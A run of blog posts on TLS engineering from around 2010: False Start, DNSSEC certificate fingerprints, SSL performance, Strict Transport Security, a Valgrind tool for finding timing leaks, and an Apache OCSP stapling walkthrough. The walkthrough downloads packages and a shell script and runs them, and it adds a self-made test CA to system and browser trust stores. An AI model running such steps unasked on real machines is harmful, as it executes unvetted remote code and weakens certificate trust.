Blacklists require effort to maintain and we'll have to be responsive to make it work. But, with our near-weekly dev channel and even more frequently updated Canary channel, we think that we can do it. In the end, success will be measured by whether we manage to make the Internet a safe place to implement False Start and by how much we manage to reduce the blacklist over time.

DNSSEC and TLS

Ever since the DNS root was signed on July 15th, quite a few people have been wondering about the interaction of TLS and DNSSEC. On the one hand, trust in the CA system is lukewarm but, on the other, the deployment issues with getting DNSSEC to the client seem immense.

Those who saw Dan Kaminsky's talk at BlackHat, which included a patched version of Chromium performing DNSSEC validation, have probably already guessed that Dan, myself and others have been working on this problem. In this blog post I'm going to try to explain the design space as I see it.

Objectives

In the long term, we want a stronger foundation of trust for the Internet. This means both pairing back the power of the 1500 root certificates and making TLS easier to deploy and thus more commonly used.

So one of the goals is to serve sites which currently don't have a CA signed certificate. We can do that by allowing them to publish fingerprints in DNS and having browsers accept those (DNSSEC secured) fingerprints.

There might also be speed advantages to be had by avoiding OCSP and CRL lookups.

We also want to serve those sites which currently do have CA signed certificates. For them we can provide exclusion of other certificates issued either mistakenly or maliciously by CAs.

Yet it's important to note that this isn't a plan for the elimination of CAs. CAs are still a good way to link DNS names to legal entities. For that we need EV certificates and CAs to issue them.

The Design Space

Firstly we have the issues which are, in many respects, the least important. How should we encode the data?

What type of record? The two major candidates are a TXT record and a new type of CERT record. It's important that we figure it out as DNS queries can only ask for one type of response (ignoring ANY, which we don't want) and each query is another chance for packet loss and a painful timeout.

TXT records have the advantage that the crippled web interfaces, by which many people manage their DNS, often support them. They are also already common (try looking up TXT records for google.com, amazon.com etc). They are human readable. They are easily extendable given a sensible format.

A new CERT type is the ‘cleaner’ solution. Stuffing things in TXT records is clearly a hack and working around crappy web interfaces feels like being a good man standing still.

Where to put the record? If one were to use a TXT record then the temptation would be to put it on a prefix label like _tls.www.example.com. However, if www.example.com is a CNAME then we won't get a helpful answer: probably just an NXDOMAIN and we'll have to hunt around: taking many round trips and a painful latency hit. Because of this, I like putting the record on the target domain name.

Next we'll consider some of the deployment options because they inform some of the points to follow.

What about clients without DNSSEC resolution ability? This is a big question. We don't care if your ISP's resolver is going to set the AD (Authenticated Data) bit in DNS replies: we don't trust it. We need either a local recursive resolver or we need the full DNSSEC chain so that we can check the signatures ourselves.

(It's worth pointing out that, although we can't trust any fingerprint information without DNSSSEC, we can provide exclusion without DNSSEC. It's a bit of a weak threat model: the attacker would have to control some of your network but not your DNS resolutions: maybe you have the records cached with a long TTL.)

One option is to put an aggressive DNSSEC resolver in the client and set DO (DNSSEC OK) and CD (Checking Disabled) bits in the requests to get the signatures themselves.

What about clients which can't even do DNS resolution correctly? (Also known as the Hotel Network Problem.) For them we could tunnel DNS over HTTP. In fact, if you encode the request in a GET request you can set the HTTP caching headers so that HTTP caches are DNS caches too (Dan's trick).

If we're talking over HTTP, why not get the server to give us the whole chain? In that case, what about an EDNS0 option to ask for the full chain? Both are possibilities.

How about putting the DNSSEC chain in other protocols? What about embedding the chain in an X.509 certificate? Chain embedding can solve the needs of sites which want to use self-signed certificates.

Now we can start to get to some of the more meaty issues:

Fingerprint in record? If you only have a single certificate then you want to put the fingerprint in a record on the domain name. That way the client can start the lookup at the same time as for the A record. But if you have many fingerprints, that becomes troublesome and you want to lookup a domain named by the fingerprint. That's slower because you can only start that lookup once you have the certificate from the server. The answer looks to be that one has to handle both types of lookup.

What to hash? If we are going to embed a DNSSEC chain in a certificate, then the fingerprint can't cover the whole certificate (because then the hash would have to cover itself). So that suggests hashing only the public key. However, if we do that then the attacker can change other parts of the certificate at will.

Here we have a bit of an impedance mismatch with the X.509 world. Existing APIs are usually of the form “please validate this certificate”. Once validated, everything in the certificate is trusted because CAs are the Voice of God. However, in a DNSSEC world, authority is scoped.

If we hash only the public key then an attacker could include things in an X.509 certificate for example.com which would appear to have the authority of example.com to an unsuspecting application. If we hash the whole certificate then example.com could put things in its certificate which might assert things which example.com shouldn't be allowed to. Applications which work on the Voice of God model could be misled.

It's tricky. At the moment we are supporting both models.

Should we include a flag to perform CA validation in addition? For performance reasons, people might want to use just DNSSEC because one can avoid OCSP and CRL lookups that way. For EV certs, we certainly want to perform CA validation in addition, but what about DV certs? Some people might like the idea of enforcing the expiry and OCSP checks.

TLS extensions? Embedding a DNSSEC chain in an X.509 certificate means that you need to regenerate the certificate once a week or so (because DNSSEC signatures expire). Also, CAs aren't going to sign certificates with a random blob of binary data that they don't understand. Because of this, it's been suggested that we could carry the DNSSEC chain in a TLS extension. However, chain embedding is for those servers which don't have a CA issued certificate. Clients aren't going to be able to require DNSSEC for many years, if ever. And if we're going to accept CA certificates without DNSSEC, then an embedded chain can't provide exclusion.

The Code

The code is minimal so far. Chrome trunk already includes support for validating DNSSEC chains embedded inside an X.509 cert, although it requires a command line flag to enable. I also have code to generate the chains. However, the format of the chain is going to change so I'm not making that public yet.

Hopefully there will be something more substantial in a couple of months.

SSL Survey

Ivan Ristić has put together a fantastic survey of the state of SSL/TLS on the web. Some highlights include:

  • 50% of the root CAs in Firefox appear to be unused.
  • 44% of sites send unneeded certificates in their chains.
  • 99% of sites work with only 23 roots.
  • A total of 3 DSA keys from all valid sites found.
  • 50% of servers still support SSLv2
  • Almost nobody uses TLS 1.1 or 1.2
  • Only 12 sites support STS :(
  • 20.5% support the reneg extension.
  • (32% support insecure renegotiation.)

Clipping in Chromium

I'm a guest poster on the Chromium Notes blog today, talking about clipping in Skia and Chromium.

Overclocking SSL

(This is a write up of the talk that I gave at Velocity 2010 last Thursday. This is a joint work of myself, Nagendra Modadugu and Wan-Teh Chang.)

The ‘S’ in HTTPS stands for ‘secure’ and the security is provided by SSL/TLS. SSL/TLS is a standard network protocol which is implemented in every browser and web server to provide confidentiality and integrity for HTTPS traffic.

If there's one point that we want to communicate to the world, it's that SSL/TLS is not computationally expensive any more. Ten years ago it might have been true, but it's just not the case any more. You too can afford to enable HTTPS for your users.

In January this year (2010), Gmail switched to using HTTPS for everything by default. Previously it had been introduced as an option, but now all of our users use HTTPS to secure their email between their browsers and Google, all the time. In order to do this we had to deploy no additional machines and no special hardware. On our production frontend machines, SSL/TLS accounts for less than 1% of the CPU load, less than 10KB of memory per connection and less than 2% of network overhead. Many people believe that SSL takes a lot of CPU time and we hope the above numbers (public for the first time) will help to dispel that.

If you stop reading now you only need to remember one thing: SSL/TLS is not computationally expensive any more.

The first part of this text contains hints for SSL/TLS performance and then the second half deals with things that Google is doing to address the latency that SSL/TLS adds.

Basic configuration

Modern hardware can perform 1500 handshakes/second/core. That's assuming that the handshakes involve a 1024-bit RSA private operation (make sure to use 64-bit software). If your site needs high security then you might want larger public key sizes or ephemeral Diffie-Hellman, but then you're not the HTTP-only site that this presentation is aimed at. But pick your certificate size carefully.

It's also important to pick your preferred ciphersuites. Most large sites (Google included) will try to pick RC4 because it's very fast and, as a stream cipher, doesn't require padding. Recent Intel chips (Westmere) contain AES instructions which can make AES the better choice, but remember that there's no point using AES-256 with a 1024-bit public key. Also keep in mind that ephemeral Diffie-Hellman (EDH or DHE) ciphersuites will handshake at about half the speed of pure RSA ciphersuites. However, with a pure RSA ciphersuite, an attacker can record traffic, crack (or steal) your private key at will and decrypt the traffic retrospectively, so consider your needs.

OpenSSL tends to allocate about 50KB of memory for each connection. We have patched OpenSSL to reduce this to about 5KB and the Tor project have independently written a similar patch that is now upstream. (Check for SSL_MODE_RELEASE_BUFFERS in OpenSSL 1.0.0a.). Keeping memory usage down is vitally important when dealing with many connections.

Resumption

There are two types of SSL/TLS handshake: a full handshake and an abbreviated handshake. The full handshake takes two round trips (in addition to the round trip from the TCP handshake):

The abbreviated handshake occurs when the connection can resume a previous session. This can only occur if the client has the previous session information cached. Since the session information contains key material, it's never cached on disk so the attempted client resume rate, seen by Google, is only 50%. Older clients also require that the server cache the session information. Since these old clients haven't gone away yet, it's vitally important to setup a shared session cache if you have multiple frontend machines. The server-side miss rate at Google is less than 10%.

An abbreviated handshake saves the server performing an RSA operation, but those are cheap anyway. More importantly, it saves a round-trip time:

Addressing round trips is a major focus of our SSL/TLS work at Google (see below).

Certificates

We've already mentioned that you probably don't want to use 4096-bit certificates without a very good reason, but there are other certificate issues which can cause a major slowdown.

Firstly, most certificates from CAs require an intermediate certificate to be presented by the server. Rather than have the root certificate sign the end certificates directly, the root signs the intermediate and the intermediate signs the end certificate. Sometimes there are several intermediate certificates.

If you forget to include an intermediate certificate then things will probably still work. The end certificate will contain the URL of the intermediate certificate and, if the intermediate certificate is missing, the browser will fetch it. This is obviously very slow (a DNS lookup, TCP connection and HTTP request blocking the handshake to your site). Unfortunately there's a constant pressure on browsers to work around issues and, because of this, many sites which are missing certificates will never notice because the site still functions. So make sure to include all your certificates (in the correct order)!

There's a second certificate issue that can increase latency: the certificate chain can be too large. A TCP connection will only send so much data before waiting to hear from the other side. It slowly ramps this amount up over time, but a new TCP connection will only send (typically) three packets. This is called the initial congestion window (initcwnd). If your certificates are large enough, they can overflow the initcwnd and cause an additional round trip as the server waits for the client to ACK the packets:

For example, www.bankofamerica.com sends four certificates: 1624 bytes, 1488 bytes, 1226 bytes and 576 bytes. That will overflow the initcwnd, but it's not clear what they could do about that if their CA really requires that many intermediate certificates. On the other hand, edgecastcdn.net has a single certificate that's 4093 bytes long, containing 107 hostnames!

Packets and records

SSL/TLS packages the bytes of the application protocol (HTTP in our case) into records. Each record has a signature and a header. Records are packed into packets and each packet has headers. The overhead of a record is typically 25 to 40 bytes (based on common ciphersuites) and the overhead of a packet is around 52 bytes. So it's vitally important not to send lots of small packets with small records in them.

I don't want to be seen to be picking on Bank Of America, it's honestly just the first site that I tried, but looking at their packets in Wireshark, we see many small records, often sent in a single packet. A quick sample of the record sizes: 638 bytes, 1363, 15628, 69, 182, 34, 18, … This is often caused because OpenSSL will build a record from each call to SSL_write and the kernel, with Nagle disabled, will send out packets to minimise latency.

This can be fixed with a couple of tricks: buffer in front of OpenSSL and don't make SSL_write calls with small amounts of data if you have more coming. Also, if code limitations mean that you are building small records in some cases, then use TCP_CORK to pack several of them into a packet.

But don't make the records too large either! See the 15KB record that https://www.bankofamerica.com sent? None of that data can be parsed by the browser until the whole record has been received. As the congestion window opens up, those large records tend to span several windows and so there's an extra round trip of delay before the browser gets any of that data. Since the browser is pre-parsing the HTML for subresources, it'll delay discovery and cause more knock-on effects.

So how large should records be? There's always going to be some uncertainty in that number because the size of the TCP header depends on the OS and the number of SACK blocks that need to be sent. In the ideal case, each packet is full and contains exactly one record. Start with a value of 1415 bytes for a non-padded ciphersuite (like RC4), or 1403 bytes for an AES based ciphersuite and look at the packets which result from that.

OCSP and CRLs

OCSP and CRLs are both methods of dealing with certificate revocation: what to do when you lose control of your private key. The certificates themselves contain the details of how to check if they have been revoked.

OCSP is a protocol for asking the issuing authority “What's the status of this certificate?” and a CRL is a list of certificates which have been revoked by the issuing authority. Both are fetched over HTTP and a certificate can specify an OCSP URL, a CRL URL, or both. But certificate authorities will typically use at least OCSP.

Firefox 2 and IE on Windows XP won't block an SSL/TLS handshake for either revocation method. IE on Vista will block for OCSP, as will Firefox 3. Since there can be several OCSP requests resulting from a handshake (one for each certificate), and because OCSP responders can be slow, this can result in hundreds of milliseconds of additional latency for the first connection. I don't have really good data yet, but hopefully soon.

The answer to this is OCSP stapling: the SSL/TLS server includes the OCSP response in the handshake. OCSP responses are public and typically last for a week, so the server can do the work of fetching them and reuse the response for many connections. The latest alpha of Apache supports this (httpd 2.3.6-alpha). Google is currently rolling out support.

However, OCSP stapling has several issues. Firstly, the protocol only allows the server to staple one response into the handshake: so if you have more than one certificate in the chain the client will probably end up doing an OCSP check anyway. Secondly, an OCSP response is about 1K of data. Remember the issue with overflowing the initcwnd with large certificates? Well the OCSP response is included in the same part of the handshake, so it puts even more pressure on certificate sizes.

Google's SSL/TLS work

Google is working on a number of fronts here. I'll deal with them in order of deployment and complexity.

Firstly we have False Start. All you really need to know is that it reduces the number of round trips for a full handshake from two to one. Thus, there's no longer any latency advantage to resuming. It's a client-side change which should be live in Chrome 8 and is already in some builds of Android Froyo.

Secondly, Chrome will soon have OCSP preloading. This involves predicting the certificates that a server will use based on past experience and starting the OCSP lookups concurrently with the DNS resolution and TCP connection.

Slightly more complex, but deployed, is Next Protocol Negotiation. This pushes negotiation of the application level protocol down into the TLS handshake. It's how we trigger the use of SPDY. It's live on the Google frontend servers and in Chrome (6).

Lastly, and most complex, is Snap Start. This reduces the round trip times to zero for both types of handshakes. It's a client and server side change and it assumes that the client has the server's certificate cached and has up-to-date OCSP information. However, since the certificate and OCSP responses are public information, we can cache them on disk for long periods of time.

Conclusion

I hope that was helpful. We want to make the web faster and more secure and this sort of communication helps keep the world abreast of what we're doing.

Also, don't forget that we recently deployed encrypted web search on https://encrypted.google.com. Switch your search engine!

(updated 26th Oct 2010: mentioned OpenSSL 1.0.0a now that it's released, updated the status of OCSP stapling and False Start and added a mention of OCSP preloading.)

curve25519 in iOS4

Someone pointed out to me that I'm in the credits for iOS4 (the operating system formerly known as iPhone OS) for curve25519-donna. Unfortunately, I have no idea what they're using it for! I would be fascinated to know.

Update: (2012-06-26) The use is described in this document from Apple.

TLS latency improvements

We've published several drafts recently concerning reducing the number of round trips in SSL/TLS. Firstly, False Start is a client-side only change which reduces the number of round trips for a full handshake to one. It's in Android Froyo and Chrome (Linux since 5.x, Mac and Windows since 6.x). Secondly, Snap Start is a client and server change which reduces the overhead to zero. The code for it is still preliminary, but it might make it into Chrome 6.x. Snap Start requires that the client cache some information about the server but, unlike resume information, that data can be cached on disk.

This is all part of an ongoing effort to make the web faster.

Full handshakeResume handshake
(Round trip times)
Standard TLS21
False Start11
Snap Start00

Speaking at Velocity

O'Reilly Velocity Conference 2010

I'll be presenting various SSL/TLS work at the O'Reilly Velocity Conference in June. Specifically, 2:30pm on Thursday the 24th of June.

You can also see the outline of the talk here, although wtc, ngm and I have yet to nail down the precise contents.

WOFF support in Chromium

Last week I added WOFF support to Chromium. It's currently on trunk and hopefully will be included in a dev channel release by the end of this week.

WOFF is a repackaging of the old sfnt/TrueType/OpenType format. Conceptually it's just a gzipped TTF file with optional sections for a chunk of XML and a chunk of 'private data'. Since TrueType is a table based format already, those two optional sections could have been included as tables. And since we have gzip as a transport encoding in all reasonable HTTP servers, that's a little pointless too.

So, technically, there's no need to WOFF to exist at all. It's all politics. The type foundries didn't want a format which people could use on their computers. Of course, it's trivial to convert them (Chromium does it internally), but if it gets the foundries and Microsoft on board, then it's worthwhile.

But I do worry that WOFF will actually make web sites look worse. All the samples and examples that I've seen (even the nice ones) are terribly hinted. I assume that this is because the people doing them are using Macs, which traditionally don't hint anyway. But I prefer strong hinting and, in this mode, the free fonts look blotchy. They just haven't had the time and effort put in that my system fonts (often msttcorefonts) have had.

So I can always tell when a site is using @font-face, because it looks bad. Which is rather a shame given the intention.

Checking that functions are constant time with Valgrind

Information leaks via timing side channels can be deadly. You can steal RSA keys from other processes on the same host, extract the kernel's dm_crypt keys and steal AES keys over the network.

In order for a function to be constant time, the branches taken and memory addresses accessed must be independent of any secret inputs. (That's assuming that the fundamental processor instructions are constant time, but that's true for all sane CPUs.)

However, it's tough to write constant time functions. You can see the source to a few simple ones that I wrote Go. Sometimes the design of the function is fundamentally flawed (like AES), but even when the function can be efficiently implemented in a constant time fashion, it's easy to slip up. Careful code review is currently the best practice but it's error prone as the amount of code increases and fragile in the face of change.

A type system could probably help here, but that's not the path I'm taking today. Since cryptographic functions result in abnormally straight line code, it's common for a typical input to exercise every instruction. So a tool like Valgrind could check all the branches and memory accesses to make sure that they haven't been tainted with secret data.

This would mean keeping track of every bit in memory to know if it's secret or not, likewise for all the CPU registers. Preferably at the bit level. The tool would also have to know that adding secret and non-secret data results in secret data etc. That suggests that it would be quite a complex tool.

But memcheck already does this! In order to keep track of uninitialised data it shadows every bit of memory and will warn you if you use uninitialised data in a branch or to index a memory access. So if we could tell memcheck to treat our secret data as uninitialised, everything should just work.

I've a Valgrind patch does just that (against SVN r11097). It will intercept any calls to ct_poison and ct_unpoison in libctgrind.so*.

Let's look at a bad way to test a 128-bit MAC against a calculated value:

char check16_bad(unsigned char *a, unsigned char *b) {
  unsigned i;
  for (i = 0; i < 16; i++) {
    if (a[i] != b[i])
      return 0;
  }

  return 1;
}
And now, testing it with memcheck/ctgrind:
int
main() {
  unsigned char a[16], b[16];

  memset(a, 42, sizeof(a));
  memset(b, 42, sizeof(b));

  ct_poison(a, sizeof(a));

  printf("check16_bad\n");
  check16_bad(a, b);

  return 0;
}
$ /home/agl/devel/valgrind/vg-in-place ./a.out
...
check16_bad
==30993== Conditional jump or move depends on uninitialised value(s)
==30993==    at 0x40067F: check16_bad (test.c:11)
==30993==    by 0x40075F: main (test.c:44)

It seems to work! There are a few other tests in test.c which show the correct way to implement that function and well as a demo to show that secret dependent memory accesses are also caught by this tool.

We can test a few other things too. It confirms that donna-c64 is constant time, which is nice. I also tested BN_mod_exp_mont_consttime from OpenSSL since that's a large function which calls functions from several other files.

It turns out not to be constant time! There's a secret dependent memory access:

==31076== Use of uninitialised value of size 8
==31076==    at 0x402210: MOD_EXP_CTIME_COPY_FROM_PREBUF (bn_exp.c:554)
==31076==    by 0x40277B: BN_mod_exp_mont_consttime (bn_exp.c:703)
==31076==    by 0x4011FF: main (ossl.c:24)

From inspection of the code, this appears to be a true positive. To be fair, the comment above the function suggests that it's rather misnamed:

/* This variant of BN_mod_exp_mont() uses fixed windows and the special
 * precomputation memory layout to limit data-dependency to a minimum
 * to protect secret exponents

It only claims to "limit" the side-channel leaks. I don't know how serious this is, but then you never do till someone gets a paper published by stealing all your secrets.

Time to update OpenSSL 0.9.8m

If you're using OpenSSL 0.9.8m as either a client or server (but esp as a server) then it's time to update to 0.9.8n.

OpenSSL Security Advisory [24 March 2010]

"Record of death" vulnerability in OpenSSL 0.9.8f through 0.9.8m
================================================================

In TLS connections, certain incorrectly formatted records can cause an OpenSSL
client or server to crash due to a read attempt at NULL.

Affected versions depend on the C compiler used with OpenSSL:

- If 'short' is a 16-bit integer, this issue applies only to OpenSSL 0.9.8m.
- Otherwise, this issue applies to OpenSSL 0.9.8f through 0.9.8m.

Users of OpenSSL should update to the OpenSSL 0.9.8n release, which contains a
patch to correct this issue.  If upgrading is not immediately possible, the
source code patch provided in this advisory should be applied.

Bodo Moeller and Adam Langley (Google) have identified the vulnerability
and prepared the fix.

Macs everywhere

The Setup is a neat site. They find (somewhat) famous techie people and interview them about what hardware and software they use. I was browsing through it because I recognised some of the names, and because it's always neat to find out about tools that you don't use.

But it struck me how many people were using OS X as their primary, day to day, operating system. So I went through every one of them and added up the numbers (except Why the Lucky Stiff, because they put an underscore at the start of the domain name; stopping it from resolving).

Windows: 3.5, Linux: 3, Mac: 29.5

These folks aren't all hardcore coders to be sure, but one of the Linux users is RMS and I'm not sure he counts! It would be like asking Steve Jobs what he uses.

But gosh, that's a total OS X domination.

Strict Transport Security

Chrome 4 went stable yesterday. One of the many new things in this release is the addition of Strict Transport Security. STS allows a site to request that it always be contacted over HTTPS. So far, only Chrome supports it. However, the popular NoScript Firefox extension also supports it and hopefully support will appear in Firefox proper at some point.

The issue that STS addresses is that users tend to type http:// at best, and omit the scheme entirely most of the time. In the latter case, browsers will insert http:// for them.

However, HTTP is insecure. An attacker can grab that connection, manipulate it and only the most eagle eyed users might notice that it redirected to https://www.bank0famerica.com or some such. From then on, the user is under the control of the attacker, who can intercept passwords etc at will.

An STS enabled server can include the following header in an HTTPS reply:

Strict-Transport-Security: max-age=16070400; includeSubDomains

When the browser sees this, it will remember, for the given number of seconds, that the current domain should only be contacted over HTTPS. In the future, if the user types http:// or omits the scheme, HTTPS is the default. In fact, all requests for URLs in the current domain will be redirected to HTTPS. (So you have to make sure that you can serve them all!).

For more details, see the specification.

There is still a window where a user who has a fresh install, or who wipes out their local state, is vulnerable. Because of that, we'll be starting a "Preloaded STS" list. These domains will be configured for STS out of the box. In the beginning, this will be hardcoded into the binary. As it (hopefully) grows, it can change into a list this is shared across browsers, like the safe-browsing database is today.

If you own a site that you would like to see included in the preloaded STS list, contact me at .

Setting up Apache with OCSP stapling

OCSP is the Online Certificate Status Protocol. It's a way for TLS clients to check if a certificate is expired. A certificate with OCSP enabled includes a URL to which a client can send a POST request and receive a signed statement that a given certificate is still valid.

This adds quite a bit of latency to the TLS connection setup as the client has to perform a DNS lookup on the OCSP server hostname, create an HTTP connection and perform the request-response transaction.

OCSP stapling allows the TLS server to include a recent OCSP response in the TLS handshake so that the client doesn't have to perform its own check. This also reduces load on the OCSP server.

Apache recently got support for OCSP stapling and this post details how to set it up.

1. Prerequisites

Apache support got added in this revision. At the time of writing, no release of Apache includes this so we get it from SVN below.

OpenSSL support was added in 0.9.8h. The version in Ubuntu Karmic is not recent enough, so I pulled the packages from lucid for this:

cd /tmp
wget 'http://mirrors.kernel.org/ubuntu/pool/main/o/openssl/openssl_0.9.8k-7ubuntu3_amd64.deb'
wget 'http://mirrors.kernel.org/ubuntu/pool/main/o/openssl/libssl-dev_0.9.8k-7ubuntu3_amd64.deb'
wget 'http://mirrors.kernel.org/ubuntu/pool/main/o/openssl/libssl0.9.8_0.9.8k-7ubuntu3_amd64.deb'

sudo dpkg -i openssl_0.9.8k-7ubuntu3_amd64.deb libssl0.9.8_0.9.8k-7ubuntu3_amd64.deb  libssl-dev_0.9.8k-7ubuntu3_amd64.deb

2. Building Apache

As noted, we need the SVN version of Apache at the time of writing. I'll be using some paths in the following that you should change (like /home/agl/local/ocsp):

svn checkout http://svn.apache.org/repos/asf/httpd/httpd/trunk httpd
cd httpd
svn co http://svn.apache.org/repos/asf/apr/apr/trunk srclib/apr
./buildconf
cd srclib/apr
./configure --prefix=/home/agl/local/ocsp

At this point, I had to patch APR in order to get it to build. I suspect this build break will be fixed in short order but, for the sake of completeness, here's the patch that I applied:

--- poll/unix/pollset.c (revision 892677)
+++ poll/unix/pollset.c (working copy)
@@ -129,6 +129,8 @@
 
 static apr_status_t close_wakeup_pipe(apr_pollset_t *pollset)
 {
+    apr_status_t rv0, rv1;
+
     /* Close both sides of the wakeup pipe */
     if (pollset->wakeup_pipe[0]) {
     rv0 = apr_file_close(pollset->wakeup_pipe[0]);

Now we can build and install Apache itself. Since we are giving a prefix option, this doesn't conflict with any system installs.

cd ../..
./configure --prefix=/home/agl/local/ocsp --with-apr=/home/agl/local/ocsp --enable-ssl --enable-socache-dbm

Again, for the sake of completeness, I'll mention that Apache SVN had a bug at the time of writing that will stop OCSP stapling from working:

--- modules/ssl/ssl_util_stapling.c     (revision 892677)
+++ modules/ssl/ssl_util_stapling.c     (working copy)
@@ -414,6 +414,10 @@
        goto done;
    }

+    if (uri.port == 0) {
+        uri.port = APR_URI_HTTP_DEFAULT_PORT;
+    }
+
    *prsp = modssl_dispatch_ocsp_request(&uri, mctx->stapling_responder_timeout,
                                         req, conn, vpool);

Then build and install it...

make -j4
make install

3. Generating certs

For this example, I'll be generating a CA cert, a server cert and an OCSP responder cert for that CA. In the real world you'll probably be getting the certs from a true CA, so you can skip this step.

cd /home/agl/local/ocsp
mkdir certs && cd certs
wget 'https://fedorahosted.org/pkinit-nss/browser/doc/openssl/make-certs.sh?format=txt'
mv make-certs.sh\?format=txt make-certs.sh
/bin/bash ./make-certs.sh europa.sfo.corp.google.com test@example.com all ocsp:http://europa.sfo.corp.google.com/
cat ocsp.crt ocsp.key > ocsp.pem

Now I'm going to add the CA that was just generated to the CA set. Firstly, Chromium uses an NSS database in your home directory:

certutil -d sql:/home/agl/.pki/nssdb -A -n testCA -i ~/local/ocsp/certs/ca.crt -t Cu,,

OpenSSL uses a file of PEM certs:

cd /etc/ssl
cp cert.pem cert.pem.orig
rm cert.pem
cat cert.pem.orig /home/agl/local/ocsp/certs/ca.crt > cert.pem

4. Running the responder

In the real world, the OCSP responder is run by the CA that you got your certificate from. But here I'm going to be running my own since I generated a new CA in section 3.

cd ~/local/ocsp
touch index.txt
sudo openssl ocsp -index index.txt -port 80 -rsigner certs/ca.pem -CA certs/ca.pem

5. Configuring Apache

I won't cover the basics of configuring Apache here. There are plenty of documents on the web about that. I'll just note that I have Apache only listening on port 443 since my OCSP responder is running on 80.

The config that you'll need is roughly this:

SSLStaplingCache dbm:/tmp/staples
SSLCACertificateFile "/etc/ssl/cert.pem"
SSLUseStapling on

(You probably want to choose a better location for the cache.)

Apache will parse its server certificate on startup and extract the OCSP responder URL. It needs to find the CA certificate in order to validate OCSP responces and that's why the SSLCACertificateFile directive is there (and why we added the CA to that file in section 3).

After restarting Apache, look in the error.log. What you don't want to see is the following:

[Sun Dec 20 17:24:28 2009] [error] ssl_stapling_init_cert: Can't retrieve issuer certificate!
[Sun Dec 20 17:24:28 2009] [error] Unable to configure server certificate for stapling

That means that Apache couldn't find the CA cert.

There are other directives, but they are currently undocumented. Your best bet is to look at the original Apache bug and the commit itself.

Chrome Linux Beta

Life goals: get a comic published. Check.

Digital Economy Bill

Cory Doctorow seems to have crafted the lexicon of the opposition to the Digital Economy Bill with his phrase ‘Pirate Finder General’ [1]. In his follow up he claims that this bill will introduce three-strikes, ISP spying and powers for Peter Mandelson to rewrite copyright law at will.

I spent a fun-filled Sunday afternoon reading the bill to see how bad it really is so that you don't have to (although you still should). You're welcome.

Firstly, the changes to copyright law are only a small part of the bill. Other parts of the bill cover: Channel 4 and Channel 3 licensing, removing the requirements for Teletext, digital switch over, radio licenses and classification of video games. I won't be talking about those in this post.

The bill requires that ISPs pass on infringement notices to subscribers, either via email or via the postal system. Copyright owners can also request infringement lists. This allows them to see that their notices A, B, C all went to the same subscriber. They can then take this information to court and proceed with the usual actions. (124A and 124B.)

The bill defers much of the policy in this area to a code that is to be written by OFCOM with the approval of the Secretary of State. This code includes the number of infringement notices that a single subscriber needs in order to be included in a report, the size of fines to be imposed on ISPs for failing to follow the code and the appeals process. The Secretary of State sets the compensation paid from copyright holders to ISPs and from everyone to OFCOM (124L).

What isn't in the bill is any talk of disconnection, ISP spying or three strikes. However, 124H gives the Secretary of State the power to require any “technical obligation”.

(3) A "technical measure" is a measure that (a) limits the speed or other capacity of the service provided to a subscriber; (b) prevents a subscriber from using the service to gain access to particular material, or limits such use; (c) suspends the service provided to a subscriber; or (d) limits the service provided to a subscriber in another way.

A brief interlude about statutory instruments is needed here. SIs are published by the government and cannot be amended by Parliament. There are two types. The first takes effect automatically and Parliament has a short time (usually 40 days depending on holidays etc) to annul it. The second requires positive action by both Houses before it takes effect.

According to Wikipedia, the last time that an SI was annulled was in 2000, and 1979 before that. The last time that an SI wasn't approved was 40 years ago.

The powers to impose technical measures are of the annul variety: they take effect automatically after 40 days. They don't appear to include requiring ISPs to spy.

After that power, 302A gives the Secretary of State the power to change the Copyright Act via a positive action SI “for the purpose of preventing or reducing the infringement of copyright by means of the internet”.

Next up, 124N gives the Secretary of State the power to take over any domain name registrar. By my reading, that is no exaggeration.

The Secretary can take action if they believe that the actions of a registrar affect “(a) the reputation or availability of electronic communications networks or electronic communications services [...] (b) the interests of consumers or members of the public [...].”. The action can either be to appoint a “manager”, who has total power, or to ask a court to change the constitution of the body and enjoin them from changing it back.

There's no requirement that this registrar be based in the UK, or even to allocate in the uk ccTLD.

Understandably, they are quite upset about this.

I'd also like to quickly note that this bill contains provisions for the licensing of orphan works without the copyright holder being involved also for libraries to have the rights to lend out e-books. (Although without giving any powers to do anything about technical limitations on e-books that might prevent it.)

Lastly, and I might be misunderstanding something here, on page 52 the Secretary of State seems to get powers to amend or annul anything relating to this act, in any bill in this session of Parliament, or before, by using a positive action SI.

Hopefully the above provides pointers for people who want to understand and read the bill. Now, my (informed) opining:

This is an abomination. It's an attempt to subvert Parliament by giving the government the power to write copyright law at will. The provisions are extraordinary. The sanctions against domain name registrars are staggering. I don't know of any other case when the government can sequestrate a private entity at will. Given the international nature of the domain name system, this should cause international concern.

I expect that this power is largely intended to be a very large stick with which to force the removal of xyzsucks.com style names that embarrass business or government. No registrar will dare cross their interests if they have this power.

If you vote in the UK, goto TheyWorkForYou, lookup your MP, write a letter (on paper). Sign the petition. Support ORG.

Recent changes to SSL/TLS on the web

Most of the movement around TLS (aka SSL) currently involves people dealing with the renegotiation issues, but I'm going to sound a happier note today. TLS isn't static; things are changing for the better:

Strict transport security

My colleagues, Dr Barth and Collin Jackson proposed ForceHTTPS some time ago. This has picked up Jeff Hodges, from PayPal, and morphed into Strict Transport Security. Dr Barth and I have implemented this in Chromium and Firefox supports it with the NoScript extension.

In short, you can add a header to your HTTPS replies like: Strict-Transport-Security: max-age=86400 and the browser will remember, for the next 86400 seconds (1 day), that the origin host should only be contacted over HTTPS. It also forbids mixed content.

(Update: Dr Barth points out that the limits on mixed content have been removed as the standard has advanced!)

Chrome dev channel releases already support this and it'll be in Chrome 4.0. The hosts are stored in a JSON file in the profile directory:

{
   "+7cOz6FDyMiPEjNtc0haTPwdZPbvbPFP2NyZIA82GTM=": {
      "expiry": 1258514505.715938,
      "include_subdomains": false
   }
}

If you try to navigate to an http:// URL when that host has STS enabled, the browser will internally rewrite it to https://. Suitable sites (banks etc) should start using this as soon as possible.

Compression

Well, this certainly isn't new! OpenSSL has supported deflate compression on TLS connections for ages, but NSS (the SSL/TLS library used in all Mozilla based products for one) hasn't. This means that Firefox never supported compression, nor Thunderbird (and it's a fairly big deal for IMAP connections).

However, Wan Teh Chang and I have added deflate support to NSS and it'll be in next release. Thanks to Nelson Bolyard for the code review.

Cut through

Here's a diagram of a TLS connection from the RFC:

Client                                               Server

      ClientHello                  -------->
                                                      ServerHello
                                                     Certificate*
                                               ServerKeyExchange*
                                              CertificateRequest*
                                   <--------      ServerHelloDone
      Certificate*
      ClientKeyExchange
      CertificateVerify*
      [ChangeCipherSpec]
      Finished                     -------->
                                               [ChangeCipherSpec]
                                   <--------             Finished
